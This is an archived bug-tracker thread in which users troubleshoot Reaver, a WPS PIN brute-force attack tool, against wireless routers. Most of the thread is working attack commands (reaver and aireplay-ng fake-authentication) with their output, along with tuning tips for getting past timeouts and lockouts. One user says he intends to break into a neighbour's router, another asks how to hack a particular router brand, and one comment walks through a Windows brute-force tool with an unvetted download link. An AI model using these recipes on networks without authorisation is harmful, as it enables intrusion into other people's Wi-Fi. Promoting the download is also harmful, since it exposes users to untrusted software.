Open GoogleCodeExporter opened 9 years ago
Command line:
reaver -i mon0 -b 00:26:5A:XX:XX:XX -E -S -t 10 -T 1 -w -vv
Original comment by Sca...@gmail.com
on 12 Jan 2012 at 12:12
Define "reaver stops functioning". Does it sit there and do nothing? Does it
keep attempting the same pin? What errors/warnings does it display?
Code 2 means Reaver hit a receive timeout. Code 3 means it received an EAP
failure packet. In either case Reaver should keep trying pins.
Original comment by cheff...@tacnetsol.com
on 12 Jan 2012 at 12:14
It just sits there and does nothing.
[+] Trying pin 94965674
[+] Sending EAPOL START request
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin
Always in this order, I have waited +10 minutes. (4 seconds/attempt)
Code 0x3 does keep running.
Let me know how and what other information might help.
Original comment by Sca...@gmail.com
on 12 Jan 2012 at 1:08
Well Reaver isn't doing nothing. :) It's attempting to initiate a WPS session
with the AP, but it looks like the AP is simply not responding to Reaver's
identity response packet. I have seen instances where APs can get stuck in a
wait state and don't respond for several minutes, but it usually clears up
after 2 minutes or so.
If you stop and re-start Reaver, do you keep getting the same timeout messages?
Can you capture the traffic and provide the pcap?
Original comment by cheff...@tacnetsol.com
on 12 Jan 2012 at 2:11
If you stop and restart reaver, It will just continue properly.
Until it hits a code 0x2 again.
I will make a capture after work.
Original comment by Sca...@gmail.com
on 12 Jan 2012 at 6:34
Did another run before updating, it locked up.
Then updated to r90 and it doesn't seem to lock up anymore.
So seems like this issue was resolved in r89.
Original comment by Sca...@gmail.com
on 12 Jan 2012 at 6:16
Spoke to early. Ill attempt to capture it now.
Original comment by Sca...@gmail.com
on 12 Jan 2012 at 6:31
So i figured it out, it locks up because the router hops to a new channel.
And reaver doesn't return to a channel looking state. If i change the channel
using airodump it will continue.
I have a cap file if you like but i don't think it will be useful, since when
it hops channel it stops recording.
Original comment by Sca...@gmail.com
on 12 Jan 2012 at 6:46
There was a channel hopping bug, but r85 should have fixed this and should
identify when an AP has changed channels and switch to the appropriate channel.
It won't channel hop if you explicitly specify the channel number, or give it
the --fixed option (which it doesn't look like you are doing). Can you provide
a pcap of the beacon packets before and after the AP channel hops?
Original comment by cheff...@tacnetsol.com
on 16 Jan 2012 at 5:13
[deleted comment]
Hi, I'm really thankful for your continued attempts to fix bugs and
incompatibilities, even though I've never seen Reaver work with my own eyes.
Using r97 I have transaction failures (codes 0x3 and 0x2), and I receive 2 M1
packets.
Informations:
- Signal strength is -60 but last time I checked it was the same with -40.
- Still using Intel Wireless Link 5100 (iwlagn) and BT5 R1 Gnome 32bits against
a Livebox 2 (routeur Sagem F@st 3xxx) with a 12345670 default PIN.
- Again I'm sorry for providing no pcap.
Shell #1: aireplay-ng mon0 --fakeauth 600 -a xx:xx:xx:xx:xx:xx -e Livebox-XXXX
Shell #2: sudo reaver -i mon0 -b xx:xx:xx:xx:xx:xx -vv -A
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Switching mon0 to channel 6
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: Livebox-XXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin
// (repeat from line 4)
^C
[+] Nothing done, nothing to save.
Original comment by b1957...@nwldx.com
on 16 Jan 2012 at 11:11
try experimentig with other wlan adapters and AP's
Original comment by patricks...@gmail.com
on 16 Jan 2012 at 11:16
I tried on different kind of APs without success, but yes I intend to double
check regularly. I could not check r97 on another AP yet. And unfortunately I
don't have another adapter with a BT5 driver capable of injection. >_<
I am also fiddling every now and then with wpa_cli and wpa_supplicant to check
whether I can connect to APs using a correct PIN but no WPA key. (if wpa_cli
can't do this, then how could Reaver? Failure should prove that it's not a
Reaver issue and remove a thorn in Cheff's side, I'd say... I'm not using
wpa_cli/wpa_supplicant correctly yet though, still learning)
Also, is there any approximate date for Reaver integration within Aircrack lib?
Original comment by b1957...@nwldx.com
on 16 Jan 2012 at 11:29
A branch has been created in the aircrack-ng project for reaver. Version 1.2 is
about to be released, so reaver will be included in the 1.3 release, though I
can't say when that will be.
Original comment by cheff...@tacnetsol.com
on 17 Jan 2012 at 1:17
I'll keep an eye on that branch then. Thanks for your patience. :) *tiptoes
away*
Original comment by b1957...@nwldx.com
on 17 Jan 2012 at 5:34
I've experienced the same issues using an Alfa rtl8187. I've found the solution
to the problem is to play with the "-d" flag.
Start at "-d 15" or higher until you stop receiving the (code: 0x02) (code:
0x03) errors. Then work your way down. Each router I've tested likes a
different value.
I was also using the "--no-nacks" argument.
Original comment by cryptom...@gmail.com
on 4 Feb 2012 at 6:04
I'm using ALfa rtl8187. reaver 1.4
found this way to make it work
1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7
hope this help ;)
Original comment by itmanvn
on 12 Feb 2012 at 2:40
>>I'm using ALfa rtl8187. reaver 1.4
>>
>>found this way to make it work
>>
>>1. run: aireplay-ng mon0 -1 120 -a 68:7F:74:E2:4A:1C -e kitty-Home
>>2. then: reaver -i mon0 -A -b 68:7F:74:E2:4A:1C -c 6 -vv --no-nacks --win7
>>
>>hope this help ;)
Thank you for this comment! This worked for me. Kind of. I'm also using an Alfa
rtl8187; reaver 1.4 on BT5. As I was saying, this worked for me but now I am
stuck at 20.XX% seemingly because aireplay can no longer attack the AP. The
reason I say seemingly, is because I've tried over 5 different APs and I cannot
get the same method to work again even though aireplay does work on them.
root@root:~# sudo aireplay-ng mon0 -1 120 -a XX:XX:XX:XX:XX -e linksys
No source MAC (-h) specified. Using the device MAC (XX:XX:XX:XX:XX:XX)
09:06:51 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 1
09:06:51 Sending Authentication Request (Open System)
09:06:53 Sending Authentication Request (Open System)
09:06:55 Sending Authentication Request (Open System)
09:06:57 Sending Authentication Request (Open System)
09:06:59 Sending Authentication Request (Open System)
09:07:01 Sending Authentication Request (Open System)
09:07:03 Sending Authentication Request (Open System)
09:07:05 Sending Authentication Request (Open System)
09:07:07 Sending Authentication Request (Open System)
09:07:09 Sending Authentication Request (Open System)
09:07:11 Sending Authentication Request (Open System)
09:07:13 Sending Authentication Request (Open System)
09:07:15 Sending Authentication Request (Open System)
09:07:17 Sending Authentication Request (Open System)
09:07:19 Sending Authentication Request (Open System)
09:07:21 Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.
root@root:~# sudo reaver -i mon0 -A -b XX:XX:XX:XX:XX:XX -c 1 -vv --no-nacks
--win7
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
<cheffner@tacnetsol.com>
[+] Switching mon0 to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: linksys)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
root@root:~# aireplay-ng --test -e linksys -a XX:XX:XX:XX:XX:XX mon0
09:09:33 Waiting for beacon frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 1
09:09:33 Trying broadcast probe requests...
09:09:33 Injection is working!
09:09:35 Found 1 AP
09:09:35 Trying directed probe requests...
09:09:35 XX:XX:XX:XX:XX:XX - channel: 1 - 'linksys'
09:09:36 Ping (min/avg/max): 4.586ms/36.119ms/46.289ms Power: -39.83
09:09:36 30/30: 100%
Any comments or suggestions would be greatly appreciated!
Original comment by shoredit...@gmail.com
on 20 Feb 2012 at 8:20
start airodump-ng and scan -bssid of selected network and on selected -channel
and start reaver using options -S -N -L worked excellent for me....
Original comment by bmark...@vus.hr
on 20 Feb 2012 at 9:06
most likely the AP you are trying to associate with accepts connections only
with certain mac addresses, in other words has a mac filter
Original comment by AntonR...@gmail.com
on 21 Feb 2012 at 12:15
[deleted comment]
[deleted comment]
Comment 19 worked!
So we have 2 steps
1. aireplay-ng -1 10 -a XX:XX:XX:XX:XX:XX -e XX mon0 --ignore-negative-one
10:39:13 Sending Authentication Request (Open System) [ACK]
10:39:13 Authentication successful
10:39:13 Sending Association Request [ACK]
10:39:13 Association successful :-) (AID: 1)
Start new terminal
2. reaver -A -b XX:XX:XX:XX:XX:XX -c 11 -vv -i mon0 --dh-small --no-nacks
--ignore-locks --win7 -d 15
[+] 2.02% complete @ 2012-02-21 10:36:40 (31 seconds/pin)
If error: WPS transaction failed (code: 0x02), re-trying last pin
just increase -d value: ex -d 20, -d 25 and so on ;)
Original comment by itmanvn
on 21 Feb 2012 at 3:40
I have successfully Reaver hacked my old back up Netgear router, even though it
took a very long time as it would shut down after 20 or so attempts and then
time out for 5 minutes.
I'm now trying to prove my neighbor wrong and hack his router. I had to show
him that WEP was not good, you would think he would believe me about WPA now.
Anyway. When I try his router it gets to [+] Sending M4 (after the first PIN
attempt) and then will not respond. I've tried everything I could think of and
can never get a response after M4.
I was hoping to try the aireplay Assoc method above, but when I try to use the
-A setting Reaver still seems to want to associate with it. What am I doing
wrong?
I started aireplay, then did
# reaver -A -b 00:1C:DF:XX:XX:XX -c 6 -vv -i mon0 --dh-small --no-nacks
--ignore-locks --win7 -d 15
but got this response (still Associating);
[+] Switching mon0 to channel 6
[+] Waiting for beacon from 00:1C:DF:XX:XX:XX
[+] Associated with 00:1C:DF:CC:AE:54 (ESSID: XXXXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
Original comment by Curtis.B...@gmail.com
on 21 Feb 2012 at 7:58
so I am having the same exact issue as the post directly above: when running
reaver on my cisco wap4410n access point, After trying the first pins or so,
reaver gets stuck at Sending M4 Message.... Is the access point locking up and
not allowing attempts anymore? Could using the --ignore-locks option help at
all? I am pretty confused about this because I have tried it with other access
points and it worked ok...
Original comment by mayangvi...@gmail.com
on 22 Feb 2012 at 2:35
when i use reaver -i mon0 -b (bssid) it give
WARNING: Failed to associate with (bssid)
then i used reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 11 -e network_name -vv -A
it did get associate with bssid but then it stucks
sfz420@gmail.com
Original comment by sfz...@gmail.com
on 22 Mar 2012 at 7:41
[deleted comment]
this seems to work for me
terminal 1
aireplay-ng mon0 -1 120 -a B0:48:7A:**:**:** -q 5
terminal 2
reaver -i mon0 -c 1 -b B0:48:7A:**:**:** -d 10 -x 3 -r 5:3 -N -S -L -vv --win7
hope this helps someone
Original comment by jamesde...@gmail.com
on 25 Jan 2013 at 11:05
i have the same problem any help please....
Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x3), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[+] Sending identity response
[!] WARNING: Receive timeout occurred
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x2), re-trying last pin
Original comment by asjadme...@gmail.com
on 6 May 2013 at 1:10
Any solution to fix this issue definitely? I use the AWUS036H adaptor and
getting always the "WPS transaction failed".
Original comment by ivan.si...@gmail.com
on 2 Aug 2013 at 10:13
While Hacking SegamCom Router by Reaver it Stuck at
Trying Pin 12345670
and Stop here , is there any Solution to hack SegamCom Routers Via Reaver,
while WPS-Locked is No.
Help is required Brothers
Original comment by farrukhb...@gmail.com
on 20 Dec 2013 at 6:27
[deleted comment]
I always get stuck by wps transaction failed.
Original comment by bobowong...@gmail.com
on 28 Apr 2014 at 3:05
is there a fix? same problem here, always.
Original comment by M.K.Zer...@gmail.com
on 24 Oct 2014 at 12:27
can someone out there pls. help.
Original comment by kkchiu...@gmail.com
on 19 Jan 2015 at 8:28
Hi, Also You can use Dummper In Windows Platform!
Just Scan Networks And select Any Witch WPS Is Available And brute force With
This guide:
Please First Install WinCap.exe & JumpStart.exe
then Run Dummper.exe (Portable). Recommended Run Latest Version.
In Dummper => Redes Tab, Select Your Network Interface Card (NIC)
then Go to WPS Tab And Click Todas Les Redes Radio Button
In The Next Step , Click On Scan Button And Select The Network Which You Want
To Hack!
Then click on Jump start Button under the List and Wait to Hack Your Selected
Network!
Good Luck ;)
Download Required Software In Mediafire.com
https://www.mediafire.com/?l61rh7q0z6izcxi
Original comment by sashah...@gmail.com
on 19 Jan 2015 at 3:54
This is my set up.
I have an Alfa AWUS036NHA - VirtualBox on Windows 7
My problem is that reaver fails to associate every so often, therefore I can't
leave it running over night, because when it fails. I have to Manually
associate the AP.
I was wondering if there is a command that I can use to automatically re
associate without having to run airodump
If it gets stuck , or fails at associating I just do airodump-ng mon0 . I wait
10 seconds or so and proceed to run reaver
WARNING: Failed to associate with <macaddress> (ESSID: xxxxxx) I quit the process and have to re associate. Anyways here is my reaver code that works for me.
reaver -i mon0 -b <mac> -S -N -a -c <channel> -vv -r 17:30
How often does reaver have to associate ? is there a reason why it loses its
association?
Thank you !
Original comment by fraf...@gmail.com
on 15 Feb 2015 at 4:35
Original issue reported on code.google.com by
Sca...@gmail.com
on 11 Jan 2012 at 11:31